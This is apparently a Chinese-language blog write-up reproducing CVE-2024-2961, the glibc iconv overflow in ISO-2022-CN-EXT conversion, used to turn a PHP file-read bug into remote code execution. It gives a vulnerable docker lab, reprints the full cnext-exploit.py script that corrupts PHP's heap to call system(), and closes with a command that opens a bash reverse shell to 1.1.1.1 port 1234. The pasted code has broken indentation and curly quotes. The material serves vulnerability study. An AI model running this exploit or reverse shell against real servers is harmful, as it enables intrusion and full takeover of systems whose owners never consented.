glibc iconv()导致缓冲区溢出漏洞

php://filter任意文件读取提升为远程代码执行（RCE）

漏洞原理

glibc2.39及更早版本中的 iconv() 函数在将字符串转换为 ISO-2022-CN-EXT 字符集时，可能会使传递给它的输出缓冲区溢出最多 4 个字节，这可能会导致应用程序崩溃或覆盖相邻变量。

iconv()函数是glibc提供的用于字符编码转换的API，可以将输入转换成另一种指定的编码输出。比如将原本为gbk编码的输入转化为utf-8的编码输出。将“劄”、“䂚”、“峛”或“湿”等采用utf-8编码的汉语生僻字（博大精深的汉字）转化为ISO-2022-CN-EXT字符集输出时，会导致输出缓冲区有1-3字节的溢出。

漏洞条件

理论上PHP7.0.0-8.3.7，满足以下可以使用这个漏洞

1，file_get_contents($_GET['file']);

2，任意文件读取+getimagesize($_GET['file']);或者XXE等

3，绕disable_functions

存在可控点：file_get_contents()、file()、readfile()、fgets()、getimagesize()、SplFileObject->read()等
文件写入操作同样受到影响（如file_put_contents()及其同类函数）

环境搭建

git clone https://github.com/vulhub/vulhub.git
cd vulhub/php/CVE-2024-2961/
sudo docker-compose up -d

直接pull整个vulhub太大，可以直接按照下边的搞docker模板和一个index.php就可以

index.php

<?php    
$data = file_get_contents($_POST['file']);
echo "File contents: $data";

docker-compose.yml

version: '2'
services:
 web:
   image: vulhub/php:8.3.4-apache
   volumes:
    - ./index.php:/var/www/html/index.php
   ports:
     - "8080:80"

复现

一般情况下只用过滤器任意文件读取

php://filter/convert.base64-encode/resource=xxx

而在这个漏洞，是利用过滤器和溢出的组合拳实现RCE

如下图，可见是存在任意文件包含的，file协议读文件

php://filter/convert.iconv.UTF-8.ISO-2022-CN-EXT/resource=/etc/passwd

有完整可控的file_get_contents，直接读/proc/self/maps获得libc基地址和libc.so的绝对路径，然后读libc.so，这样所需的函数真实地址都可以得到，劫持custom_heap就可以实现。

POC

漏洞利用脚本

环境配置

wget https://raw.githubusercontent.com/ambionics/cnext-exploits/main/cnext-exploit.py
pip3 install pwntools
pip3 install https://github.com/cfreal/ten/archive/refs/heads/main.zip

cnext-exploit.py

#!/usr/bin/env python3
#
# CNEXT: PHP file-read to RCE (CVE-2024-2961)
# Date: 2024-05-27
# Author: Charles FOL @cfreal_ (LEXFO/AMBIONICS)
#
# TODO Parse LIBC to know if patched
#
# INFORMATIONS
#
# To use, implement the Remote class, which tells the exploit how to send the payload.
#

from __future__ import annotations

import base64
import zlib

from dataclasses import dataclass
from requests.exceptions import ConnectionError, ChunkedEncodingError

from pwn import *
from ten import *


HEAP_SIZE = 2 * 1024 * 1024
BUG = "劄".encode("utf-8")


class Remote:
    """A helper class to send the payload and download files.
    
    The logic of the exploit is always the same, but the exploit needs to know how to
    download files (/proc/self/maps and libc) and how to send the payload.
    
    The code here serves as an example that attacks a page that looks like:
    
    ```php
    <?php
    
    $data = file_get_contents($_POST['file']);
    echo "File contents: $data";

Tweak it to fit your target, and start the exploit.
"""

def __init__(self, url: str) -> None:
    self.url = url
    self.session = Session()

def send(self, path: str) -> Response:
    """Sends given `path` to the HTTP server. Returns the response.
    """
    return self.session.post(self.url, data={"file": path})
    
def download(self, path: str) -> bytes:
    """Returns the contents of a remote file.
    """
    path = f"php://filter/convert.base64-encode/resource={path}"
    response = self.send(path)
    data = response.re.search(b"File contents: (.*)", flags=re.S).group(1)
    return base64.decode(data)

@entry
@arg(“url”, “Target URL”)
@arg(“command”, “Command to run on the system; limited to 0x140 bytes”)
@arg(“sleep”, “Time to sleep to assert that the exploit worked. By default, 1.”)
@arg(“heap”, “Address of the main zend_mm_heap structure.”)
@arg(
“pad”,
“Number of 0x100 chunks to pad with. If the website makes a lot of heap "
“operations with this size, increase this. Defaults to 20.”,
)
@dataclass
class Exploit:
“”“CNEXT exploit: RCE using a file read primitive in PHP.””"

url: str
command: str
sleep: int = 1
heap: str = None
pad: int = 20

def __post_init__(self):
    self.remote = Remote(self.url)
    self.log = logger("EXPLOIT")
    self.info = {}
    self.heap = self.heap and int(self.heap, 16)

def check_vulnerable(self) -> None:
    """Checks whether the target is reachable and properly allows for the various
    wrappers and filters that the exploit needs.
    """
    
    def safe_download(path: str) -> bytes:
        try:
            return self.remote.download(path)
        except ConnectionError:
            failure("Target not [b]reachable[/] ?")
        

    def check_token(text: str, path: str) -> bool:
        result = safe_download(path)
        return text.encode() == result

    text = tf.random.string(50).encode()
    base64 = b64(text, misalign=True).decode()
    path = f"data:text/plain;base64,{base64}"
    
    result = safe_download(path)
    
    if text not in result:
        msg_failure("Remote.download did not return the test string")
        print("--------------------")
        print(f"Expected test string: {text}")
        print(f"Got: {result}")
        print("--------------------")
        failure("If your code works fine, it means that the [i]data://[/] wrapper does not work")

    msg_info("The [i]data://[/] wrapper works")

    text = tf.random.string(50)
    base64 = b64(text.encode(), misalign=True).decode()
    path = f"php://filter//resource=data:text/plain;base64,{base64}"
    if not check_token(text, path):
        failure("The [i]php://filter/[/] wrapper does not work")

    msg_info("The [i]php://filter/[/] wrapper works")

    text = tf.random.string(50)
    base64 = b64(compress(text.encode()), misalign=True).decode()
    path = f"php://filter/zlib.inflate/resource=data:text/plain;base64,{base64}"

    if not check_token(text, path):
        failure("The [i]zlib[/] extension is not enabled")

    msg_info("The [i]zlib[/] extension is enabled")

    msg_success("Exploit preconditions are satisfied")

def get_file(self, path: str) -> bytes:
    with msg_status(f"Downloading [i]{path}[/]..."):
        return self.remote.download(path)

def get_regions(self) -> list[Region]:
    """Obtains the memory regions of the PHP process by querying /proc/self/maps."""
    maps = self.get_file("/proc/self/maps")
    maps = maps.decode()
    PATTERN = re.compile(
        r"^([a-f0-9]+)-([a-f0-9]+)\b" r".*" r"\s([-rwx]{3}[ps])\s" r"(.*)"
    )
    regions = []
    for region in table.split(maps, strip=True):
        if match := PATTERN.match(region):
            start = int(match.group(1), 16)
            stop = int(match.group(2), 16)
            permissions = match.group(3)
            path = match.group(4)
            if "/" in path or "[" in path:
                path = path.rsplit(" ", 1)[-1]
            else:
                path = ""
            current = Region(start, stop, permissions, path)
            regions.append(current)
        else:
            print(maps)
            failure("Unable to parse memory mappings")

    self.log.info(f"Got {len(regions)} memory regions")

    return regions

def get_symbols_and_addresses(self) -> None:
    """Obtains useful symbols and addresses from the file read primitive."""
    regions = self.get_regions()

    LIBC_FILE = "/dev/shm/cnext-libc"

    # PHP's heap

    self.info["heap"] = self.heap or self.find_main_heap(regions)

    # Libc

    libc = self._get_region(regions, "libc-", "libc.so")

    self.download_file(libc.path, LIBC_FILE)

    self.info["libc"] = ELF(LIBC_FILE, checksec=False)
    self.info["libc"].address = libc.start

def _get_region(self, regions: list[Region], *names: str) -> Region:
    """Returns the first region whose name matches one of the given names."""
    for region in regions:
        if any(name in region.path for name in names):
            break
    else:
        failure("Unable to locate region")

    return region

def download_file(self, remote_path: str, local_path: str) -> None:
    """Downloads `remote_path` to `local_path`"""
    data = self.get_file(remote_path)
    Path(local_path).write(data)

def find_main_heap(self, regions: list[Region]) -> Region:
    # Any anonymous RW region with a size superior to the base heap size is a
    # candidate. The heap is at the bottom of the region.
    heaps = [
        region.stop - HEAP_SIZE + 0x40
        for region in reversed(regions)
        if region.permissions == "rw-p"
        and region.size >= HEAP_SIZE
        and region.stop & (HEAP_SIZE-1) == 0
        and region.path in ("", "[anon:zend_alloc]")
    ]

    if not heaps:
        failure("Unable to find PHP's main heap in memory")

    first = heaps[0]

    if len(heaps) > 1:
        heaps = ", ".join(map(hex, heaps))
        msg_info(f"Potential heaps: [i]{heaps}[/] (using first)")
    else:
        msg_info(f"Using [i]{hex(first)}[/] as heap")

    return first

def run(self) -> None:
    self.check_vulnerable()
    self.get_symbols_and_addresses()
    self.exploit()

def build_exploit_path(self) -> str:
    """On each step of the exploit, a filter will process each chunk one after the
    other. Processing generally involves making some kind of operation either
    on the chunk or in a destination chunk of the same size. Each operation is
    applied on every single chunk; you cannot make PHP apply iconv on the first 10
    chunks and leave the rest in place. That's where the difficulties come from.

    Keep in mind that we know the address of the main heap, and the libraries.
    ASLR/PIE do not matter here.

    The idea is to use the bug to make the freelist for chunks of size 0x100 point
    lower. For instance, we have the following free list:

    ... -> 0x7fffAABBCC900 -> 0x7fffAABBCCA00 -> 0x7fffAABBCCB00

    By triggering the bug from chunk ..900, we get:

    ... -> 0x7fffAABBCCA00 -> 0x7fffAABBCCB48 -> ???

    That's step 3.

    Now, in order to control the free list, and make it point whereever we want,
    we need to have previously put a pointer at address 0x7fffAABBCCB48. To do so,
    we'd have to have allocated 0x7fffAABBCCB00 and set our pointer at offset 0x48.
    That's step 2.

    Now, if we were to perform step2 an then step3 without anything else, we'd have
    a problem: after step2 has been processed, the free list goes bottom-up, like:

    0x7fffAABBCCB00 -> 0x7fffAABBCCA00 -> 0x7fffAABBCC900

    We need to go the other way around. That's why we have step 1: it just allocates
    chunks. When they get freed, they reverse the free list. Now step2 allocates in
    reverse order, and therefore after step2, chunks are in the correct order.

    Another problem comes up.

    To trigger the overflow in step3, we convert from UTF-8 to ISO-2022-CN-EXT.
    Since step2 creates chunks that contain pointers and pointers are generally not
    UTF-8, we cannot afford to have that conversion happen on the chunks of step2.
    To avoid this, we put the chunks in step2 at the very end of the chain, and
    prefix them with `0\n`. When dechunked (right before the iconv), they will
    "disappear" from the chain, preserving them from the character set conversion
    and saving us from an unwanted processing error that would stop the processing
    chain.

    After step3 we have a corrupted freelist with an arbitrary pointer into it. We
    don't know the precise layout of the heap, but we know that at the top of the
    heap resides a zend_mm_heap structure. We overwrite this structure in two ways.
    Its free_slot[] array contains a pointer to each free list. By overwriting it,
    we can make PHP allocate chunks whereever we want. In addition, its custom_heap
    field contains pointers to hook functions for emalloc, efree, and erealloc
    (similarly to malloc_hook, free_hook, etc. in the libc). We overwrite them and
    then overwrite the use_custom_heap flag to make PHP use these function pointers
    instead. We can now do our favorite CTF technique and get a call to
    system(<chunk>).
    We make sure that the "system" command kills the current process to avoid other
    system() calls with random chunk data, leading to undefined behaviour.

    The pad blocks just "pad" our allocations so that even if the heap of the
    process is in a random state, we still get contiguous, in order chunks for our
    exploit.

    Therefore, the whole process described here CANNOT crash. Everything falls
    perfectly in place, and nothing can get in the middle of our allocations.
    """

    LIBC = self.info["libc"]
    ADDR_EMALLOC = LIBC.symbols["__libc_malloc"]
    ADDR_EFREE = LIBC.symbols["__libc_system"]
    ADDR_EREALLOC = LIBC.symbols["__libc_realloc"]

    ADDR_HEAP = self.info["heap"]
    ADDR_FREE_SLOT = ADDR_HEAP + 0x20
    ADDR_CUSTOM_HEAP = ADDR_HEAP + 0x0168

    ADDR_FAKE_BIN = ADDR_FREE_SLOT - 0x10

    CS = 0x100

    # Pad needs to stay at size 0x100 at every step
    pad_size = CS - 0x18
    pad = b"\x00" * pad_size
    pad = chunked_chunk(pad, len(pad) + 6)
    pad = chunked_chunk(pad, len(pad) + 6)
    pad = chunked_chunk(pad, len(pad) + 6)
    pad = compressed_bucket(pad)

    step1_size = 1
    step1 = b"\x00" * step1_size
    step1 = chunked_chunk(step1)
    step1 = chunked_chunk(step1)
    step1 = chunked_chunk(step1, CS)
    step1 = compressed_bucket(step1)

    # Since these chunks contain non-UTF-8 chars, we cannot let it get converted to
    # ISO-2022-CN-EXT. We add a `0\n` that makes the 4th and last dechunk "crash"

    step2_size = 0x48
    step2 = b"\x00" * (step2_size + 8)
    step2 = chunked_chunk(step2, CS)
    step2 = chunked_chunk(step2)
    step2 = compressed_bucket(step2)

    step2_write_ptr = b"0\n".ljust(step2_size, b"\x00") + p64(ADDR_FAKE_BIN)
    step2_write_ptr = chunked_chunk(step2_write_ptr, CS)
    step2_write_ptr = chunked_chunk(step2_write_ptr)
    step2_write_ptr = compressed_bucket(step2_write_ptr)

    step3_size = CS

    step3 = b"\x00" * step3_size
    assert len(step3) == CS
    step3 = chunked_chunk(step3)
    step3 = chunked_chunk(step3)
    step3 = chunked_chunk(step3)
    step3 = compressed_bucket(step3)

    step3_overflow = b"\x00" * (step3_size - len(BUG)) + BUG
    assert len(step3_overflow) == CS
    step3_overflow = chunked_chunk(step3_overflow)
    step3_overflow = chunked_chunk(step3_overflow)
    step3_overflow = chunked_chunk(step3_overflow)
    step3_overflow = compressed_bucket(step3_overflow)

    step4_size = CS
    step4 = b"=00" + b"\x00" * (step4_size - 1)
    step4 = chunked_chunk(step4)
    step4 = chunked_chunk(step4)
    step4 = chunked_chunk(step4)
    step4 = compressed_bucket(step4)

    # This chunk will eventually overwrite mm_heap->free_slot
    # it is actually allocated 0x10 bytes BEFORE it, thus the two filler values
    step4_pwn = ptr_bucket(
        0x200000,
        0,
        # free_slot
        0,
        0,
        ADDR_CUSTOM_HEAP,  # 0x18
        0,
        0,
        0,
        0,
        0,
        0,
        0,
        0,
        0,
        0,
        0,
        0,
        0,
        ADDR_HEAP,  # 0x140
        0,
        0,
        0,
        0,
        0,
        0,
        0,
        0,
        0,
        0,
        0,
        0,
        0,
        size=CS,
    )

    step4_custom_heap = ptr_bucket(
        ADDR_EMALLOC, ADDR_EFREE, ADDR_EREALLOC, size=0x18
    )

    step4_use_custom_heap_size = 0x140

    COMMAND = self.command
    COMMAND = f"kill -9 $PPID; {COMMAND}"
    if self.sleep:
        COMMAND = f"sleep {self.sleep}; {COMMAND}"
    COMMAND = COMMAND.encode() + b"\x00"

    assert (
        len(COMMAND) <= step4_use_custom_heap_size
    ), f"Command too big ({len(COMMAND)}), it must be strictly inferior to {hex(step4_use_custom_heap_size)}"
    COMMAND = COMMAND.ljust(step4_use_custom_heap_size, b"\x00")

    step4_use_custom_heap = COMMAND
    step4_use_custom_heap = qpe(step4_use_custom_heap)
    step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
    step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
    step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
    step4_use_custom_heap = compressed_bucket(step4_use_custom_heap)

    pages = (
        step4 * 3
        + step4_pwn
        + step4_custom_heap
        + step4_use_custom_heap
        + step3_overflow
        + pad * self.pad
        + step1 * 3
        + step2_write_ptr
        + step2 * 2
    )

    resource = compress(compress(pages))
    resource = b64(resource)
    resource = f"data:text/plain;base64,{resource.decode()}"

    filters = [
        # Create buckets
        "zlib.inflate",
        "zlib.inflate",
        
        # Step 0: Setup heap
        "dechunk",
        "convert.iconv.L1.L1",
        
        # Step 1: Reverse FL order
        "dechunk",
        "convert.iconv.L1.L1",
        
        # Step 2: Put fake pointer and make FL order back to normal
        "dechunk",
        "convert.iconv.L1.L1",
        
        # Step 3: Trigger overflow
        "dechunk",
        "convert.iconv.UTF-8.ISO-2022-CN-EXT",
        
        # Step 4: Allocate at arbitrary address and change zend_mm_heap
        "convert.quoted-printable-decode",
        "convert.iconv.L1.L1",
    ]
    filters = "|".join(filters)
    path = f"php://filter/read={filters}/resource={resource}"

    return path

@inform("Triggering...")
def exploit(self) -> None:
    path = self.build_exploit_path()
    start = time.time()

    try:
        self.remote.send(path)
    except (ConnectionError, ChunkedEncodingError):
        pass
    
    msg_print()
    
    if not self.sleep:
        msg_print("    [b white on black] EXPLOIT [/][b white on green] SUCCESS [/] [i](probably)[/]")
    elif start + self.sleep <= time.time():
        msg_print("    [b white on black] EXPLOIT [/][b white on green] SUCCESS [/]")
    else:
        # Wrong heap, maybe? If the exploited suggested others, use them!
        msg_print("    [b white on black] EXPLOIT [/][b white on red] FAILURE [/]")
    
    msg_print()

def compress(data) -> bytes:
“”“Returns data suitable for zlib.inflate.
“””
# Remove 2-byte header and 4-byte checksum
return zlib.compress(data, 9)[2:-4]

def b64(data: bytes, misalign=True) -> bytes:
payload = base64.encode(data)
if not misalign and payload.endswith(“=”):
raise ValueError(f"Misaligned: {data}")
return payload.encode()

def compressed_bucket(data: bytes) -> bytes:
“”“Returns a chunk of size 0x8000 that, when dechunked, returns the data.”“”
return chunked_chunk(data, 0x8000)

def qpe(data: bytes) -> bytes:
“”“Emulates quoted-printable-encode.
“””
return “”.join(f"={x:02x}" for x in data).upper().encode()

def ptr_bucket(*ptrs, size=None) -> bytes:
“”“Creates a 0x8000 chunk that reveals pointers after every step has been ran.”“”
if size is not None:
assert len(ptrs) * 8 == size
bucket = b"".join(map(p64, ptrs))
bucket = qpe(bucket)
bucket = chunked_chunk(bucket)
bucket = chunked_chunk(bucket)
bucket = chunked_chunk(bucket)
bucket = compressed_bucket(bucket)

return bucket

def chunked_chunk(data: bytes, size: int = None) -> bytes:
“”“Constructs a chunked representation of the given chunk. If size is given, the
chunked representation has size size.
For instance, ABCD with size 10 becomes: 0004\nABCD\n.
“””
# The caller does not care about the size: let’s just add 8, which is more than
# enough
if size is None:
size = len(data) + 8
keep = len(data) + len(b"\n\n")
size = f"{len(data):x}“.rjust(size - keep, “0”)
return size.encode() + b”\n" + data + b"\n"

@dataclass
class Region:
“”“A memory region.”“”

start: int
stop: int
permissions: str
path: str

@property
def size(self) -> int:
    return self.stop - self.start

Exploit()

python exp.py http://IP/index.php “bash -c ‘bash -i >& /dev/tcp/1.1.1.1/1234 0>&1’”





# 参考

https://mp.weixin.qq.com/s/hZ9yaa2exQC5hr4OKWNUsw

https://blog.csdn.net/qq_52630607/article/details/128347260

http://wiki.allinsec.cn/?p=306

[raw.githubusercontent.com/ambionics/cnext-exploits/main/cnext-exploit.py](https://raw.githubusercontent.com/ambionics/cnext-exploits/main/cnext-exploit.py)

风尘孤狼

CVE-2024-2961复现

漏洞原理

漏洞条件

环境搭建

复现

POC

cnext-exploit.py